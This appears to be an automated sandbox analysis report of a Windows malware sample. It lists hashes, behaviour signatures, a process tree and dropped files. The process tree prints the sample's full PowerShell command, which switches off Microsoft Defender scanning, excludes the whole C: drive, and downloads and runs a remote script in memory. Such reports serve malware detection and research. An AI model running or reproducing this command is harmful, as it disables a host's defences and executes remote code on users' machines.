Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-10-2024 12:07

General

  • Target

    2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

  • Size

    50.9MB

  • MD5

    5bfa176d4d484262d8762d97bcd2b784

  • SHA1

    7f09db1fa2d3f0d4f73621516eabd95f9175de96

  • SHA256

    54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

  • SHA512

    93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675

  • SSDEEP

    1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Invoke Powershell command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Users\Admin\AppData\Local\Temp\install.exe
        install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIF6FC.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2552
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3028
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A3DB54298C273249030CB771A4DC86AD C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:616

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MSIF6FC.tmp

    Filesize

    36.6MB

    MD5

    6d9b5a3b75da266db5c237b0ac70b7f9

    SHA1

    9ce4aa208974b299ce0abeaf043740616f4f0b02

    SHA256

    d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b

    SHA512

    fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

  • C:\Users\Admin\AppData\Local\Temp\install.exe

    Filesize

    36.6MB

    MD5

    979ce82b2ea35a92fae6a60c6c3e3791

    SHA1

    8d260eea0151ee7a6aae88eb2e9015d5efb2603b

    SHA256

    be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca

    SHA512

    ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    186f3b27fdc3ff6d33d9231174d28082

    SHA1

    1a832d9159f74e3c838f487ca7c58227ffe2acdd

    SHA256

    60331954e6070f03e5c0ce799bee78e0c0830d8a0a97acd81ef46d13fd64e92c

    SHA512

    cb36cbe91737ca5b04b56ced61dd01e1af3df7bb236564871c37d9c253f666bc7d5e04a6e55f066ab0bc471bd189536f370a9c36d3046de281b048596d29b98a

  • \Users\Admin\AppData\Local\Temp\MSIF92E.tmp

    Filesize

    298KB

    MD5

    684f2d21637cb5835172edad55b6a8d9

    SHA1

    5eac3b8d0733aa11543248b769d7c30d2c53fcdb

    SHA256

    da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

    SHA512

    7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

  • memory/1928-1-0x0000000000CC0000-0x0000000004438000-memory.dmp

    Filesize

    55.5MB

  • memory/1928-32-0x0000000000CC0000-0x0000000004438000-memory.dmp

    Filesize

    55.5MB

  • memory/1928-33-0x0000000000CC0000-0x0000000004438000-memory.dmp

    Filesize

    55.5MB

  • memory/2100-11-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

  • memory/2100-12-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB